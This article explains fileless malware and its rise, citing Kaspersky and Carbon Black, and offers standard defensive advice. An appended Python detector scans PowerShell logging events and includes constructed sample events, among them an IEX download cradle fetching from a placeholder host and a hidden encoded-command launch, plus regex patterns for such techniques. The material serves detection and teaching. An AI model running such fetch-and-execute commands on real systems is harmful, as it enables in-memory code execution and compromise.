Traditional anti-malware software works by scanning the files on a computer’s storage drives. If the software finds files that match any of thousands of predetermined signatures, they’re flagged as malware. Attackers get round this by constantly iterating malware in the hope of staying one step ahead of the anti-malware companies, but in the last couple of years a form of malware that never reaches persistent storage has become more popular.
Recently released research from Kaspersky revealed a sharp uptick in the prevalence of malware that’s never committed to persistent storage, or that is largely resident in memory with a small on-disk component hidden within system utilities (rootkits) or the kernel. Fileless malware is particularly pernicious because modern varieties are so hard to find. In the attack detailed by Kaspersky, a bank’s domain controllers were infected with fileless malware which recorded system administration credentials and other data for delivery to the attackers.
According to a report from Carbon Black, in the course of 2016, fileless malware attacks increased from just under three percent of total malware to just over 16 percent. We can reasonably expect to see the number of fileless malware infections increase even more this year. The attacks largely target Windows servers and desktop machines, with the vector being malicious PowerShell scripts picked up on malware sites, or via malvertising and phishing attacks.
Hackers value both persistence and stealth. If they’ve gone to the trouble of infecting a server with malware, they don’t want it to disappear next time the system reboots, and that requires an on-disk component. But persistence is of no benefit if the malware is easily discovered. Malware attacks against enterprise organizations tend to be advanced persistent threats aimed at exfiltrating sensitive data over time.
Fileless malware substantially reduces the risk that the malicious code will be discovered, but does so at the cost of persistence.
Until relatively recently, fileless ransomware was rare, though not unheard of. The increase in the use of non-persistent attacks can be attributed to readily available exploit kits and “exploit as a service” platforms that make it straightforward for even unsophisticated hackers to deploy fileless malware attacks.
Because fileless malware is difficult to identify, the most effective way to avoid being affected is to ensure that your servers and other business machines can’t be easily compromised in the first place. Fileless malware is sophisticated, but like all malware, it depends on the existence of software vulnerabilities to exploit systems. Following standard security advice — keeping operating systems and applications up-to-date, using sufficiently complex passwords, and monitoring for signs of malicious network activity — will help reduce the likelihood of a server being compromised and infected.
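As an added example (not from the original article), one way to act on the "monitor for signs of malicious activity" advice when the vector is PowerShell: a small Python heuristic over constructed PowerShell Script Block Logging (Event ID 4104) events that flags scripts fetched and run in memory rather than from a file on disk. The event layout, the pattern names and the sample events are assumptions made for this example.

```python
import base64
import re

# Constructed sample events in the shape of PowerShell Script Block Logging
# records (Event ID 4104); these are made up for the example, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "DC01", "script": "Get-Service -Name Spooler"},
    {"host": "DC01", "script": "powershell -NoP -W Hidden -EncodedCommand "
                               "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "WS07", "script": "IEX (New-Object Net.WebClient)"
                               ".DownloadString('http://example.invalid/stage')"},
]

# Heuristics for code that is pulled down and executed in memory, which is the
# behaviour a disk-scanning anti-malware product never gets to see.
IN_MEMORY_PATTERNS = {
    "download-cradle": re.compile(r"DownloadString|DownloadData|Invoke-WebRequest", re.I),
    "invoke-expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden-window": re.compile(r"-W(indowStyle)?\s+Hidden", re.I),
}
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(script: str) -> str:
    """Expand a -EncodedCommand argument (base64 of UTF-16LE text) so the
    heuristics inspect the real command rather than the opaque blob."""
    m = ENCODED_ARG.search(script)
    if not m:
        return script
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return script
    return script[: m.start()] + decoded + script[m.end():]


def score_event(event: dict) -> list[str]:
    """Return the names of every heuristic the event matches (empty if benign)."""
    text = decode_encoded_command(event["script"])
    hits = [name for name, pat in IN_MEMORY_PATTERNS.items() if pat.search(text)]
    if ENCODED_ARG.search(event["script"]):
        hits.append("encoded-command")
    return hits


def find_suspicious(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Pair each flagged host with the heuristics it tripped."""
    return [(e["host"], score_event(e)) for e in events if score_event(e)]
```

Feeding real 4104 events through `find_suspicious` gives a per-host list of reasons that an analyst can triage, and decoding the encoded argument first is what stops an attacker from hiding the cradle behind base64.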
If your organisation doesn’t possess the expertise to secure its infrastructure, consider investing in managed security services to ensure that the infrastructure it relies on is protected.